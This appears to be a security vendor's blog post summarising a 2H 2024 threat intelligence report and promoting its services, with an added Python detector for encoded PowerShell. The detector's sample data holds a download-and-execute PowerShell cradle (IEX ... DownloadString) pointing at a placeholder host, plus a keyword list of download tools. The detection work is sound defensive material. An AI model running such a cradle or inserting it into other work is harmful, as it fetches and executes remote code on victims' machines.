
Cybersecurity Alert: Key Insights from Ontinue’s 2H 2024 Threat Intelligence Report
Ontinue’s latest threat intelligence report reveals critical insights into the evolving cybersecurity environment during the second half of 2024. As threats become more sophisticated, organizations need to understand these changes to better protect their digital assets.
Key Findings from the Report
The report highlights four major evolutionary trends in the cybersecurity sphere:
- Malware Delivery via Browser Extensions and Malvertising – Threat actors are exploiting browser extensions to deliver information-stealing malware, with these malicious extensions persisting even after system reimaging when users reimport their browser profiles.
- Advanced Phishing & Vishing Tactics – Adversaries are employing sophisticated adversary-in-the-middle (AiTM) phishing tactics, using legitimate sites as initial landing pages before redirecting victims to malicious domains. Vishing attacks have increased dramatically (1,633%), bypassing email security filters and leveraging AI-driven voice cloning technologies.
- Exploitation of IoT & OT Environments – As networks expand, attackers increasingly target IoT and OT devices, which often lack robust security controls. These devices frequently run with root privileges and perform configuration operations by passing user-supplied data through a command shell, leaving them vulnerable to various attacks.
- Ransomware Evolution – While ransom payments decreased from $1.25 billion in 2023 to $813.5 million in 2024, the number of reported breaches increased, suggesting ransomware groups are conducting more attacks to compensate for lower payment rates.
The Changing Economics of Ransomware
The report reveals fascinating shifts in ransomware dynamics. Despite the drop in total payments, attackers are adapting rather than abandoning their strategies:
- Manufacturing, services, and healthcare remain the most frequently targeted sectors
- Smaller organizations (under 50 employees) reported more incidents (1,589) than larger enterprises (513 incidents for companies with 1,000+ employees)
- Attackers are shifting toward targeting critical infrastructure where stakes—and potential payouts—are higher
Emerging Threat Vectors
The report identifies several concerning developments:
- Microsoft Tool Exploitation: Threat actors are abusing built-in Microsoft tools like Quick Assist and Windows Hello to establish access and operate covertly
- Zero-Day Development: Increased exploitation of zero-day vulnerabilities in network security products, particularly targeting edge devices
- IoT/OT Vulnerabilities: Consumer-grade devices finding their way into corporate networks create significant risks, with examples including attacks on water facilities where pro-Russian actors manipulated human-machine interfaces
Top Detection Findings
Ontinue’s Advanced Threat Operations team highlighted the most prevalent threats across their platform, including:
- Potential Lumma stealer activity via PowerShell download
- Suspicious DLL activity from unusual locations
- PlugX Remote Access Trojan activity
- Password spray attacks targeting Microsoft Entra ID
- Encoded PowerShell execution suggesting obfuscation tactics
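As an added example (not code from the Ontinue report or from CinchOps), the following Python detector covers the first and last findings above: it pulls the Base64 argument out of PowerShell's -EncodedCommand switch (including the -e, -ec and -enc abbreviations), decodes the UTF-16LE payload, and flags download-cradle keywords such as DownloadString that typify stealer delivery via PowerShell download. The process-creation events are constructed samples, and the Office-parent list is an assumed tuning choice.

```python
import base64
import re

# Constructed sample process-creation events: (parent_process, command_line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe -NoProfile -Command Get-Date"),
    ("winword.exe", "powershell.exe -w hidden -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
        .encode("utf-16le")).decode()),
    ("cmd.exe", "powershell.exe -EncodedCommand " + base64.b64encode(
        "Get-Process".encode("utf-16le")).decode()),
]

# PowerShell accepts -e, -ec, -enc or -EncodedCommand followed by Base64 text.
ENC_FLAG = re.compile(r"\s-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Keywords typical of a download cradle (fetch-and-execute in one line).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-expression|\biex\b",
    re.IGNORECASE)
# Assumed list of parents that should rarely spawn PowerShell at all.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(parent, cmdline):
    """Classify one event; severity rises for cradles and for Office parents."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"verdict": "none", "decoded": None, "severity": "info"}
    verdict = "encoded_download_cradle" if DOWNLOAD_CRADLE.search(decoded) else "encoded_powershell"
    high = verdict == "encoded_download_cradle" or parent.lower() in OFFICE_PARENTS
    return {"verdict": verdict, "decoded": decoded, "severity": "high" if high else "medium"}


def scan(events):
    """Run the classifier over (parent, command_line) pairs."""
    return [dict(parent=parent, **classify(parent, cmd)) for parent, cmd in events]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["severity"], hit["parent"], hit["verdict"], hit["decoded"])
```

The decoded command, not the Base64 blob, is what an analyst should see in the alert; matching only on the raw encoded string misses every re-encoding of the same payload.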
How CinchOps Can Help Secure Your Business
In light of these evolving threats, CinchOps offers comprehensive security solutions to protect your organization:
- Proactive Threat Detection: Our advanced monitoring systems identify suspicious activities before they become breaches, providing real-time alerts and rapid response capabilities.
- Ransomware Protection: We implement robust backup solutions, EDR technologies, and security controls specifically designed to prevent, detect, and mitigate ransomware attacks.
- Authentication Security: Our team ensures proper configuration of authentication systems like Windows Hello and implements phishing-resistant MFA options.
- IoT/OT Security Management: We provide specialized solutions for securing operational technology and Internet of Things devices, including network segmentation and continuous monitoring.
- Zero-Day Vulnerability Management: CinchOps delivers rapid emergency patching procedures for critical vulnerabilities, particularly focusing on internet-facing services and edge devices.
Discover more about our enterprise-grade, business-protecting cybersecurity services on our Cybersecurity page.
Don’t wait for a breach to improve your security posture. Contact CinchOps today to learn how our comprehensive security solutions can protect your organization against today’s sophisticated cyber threats.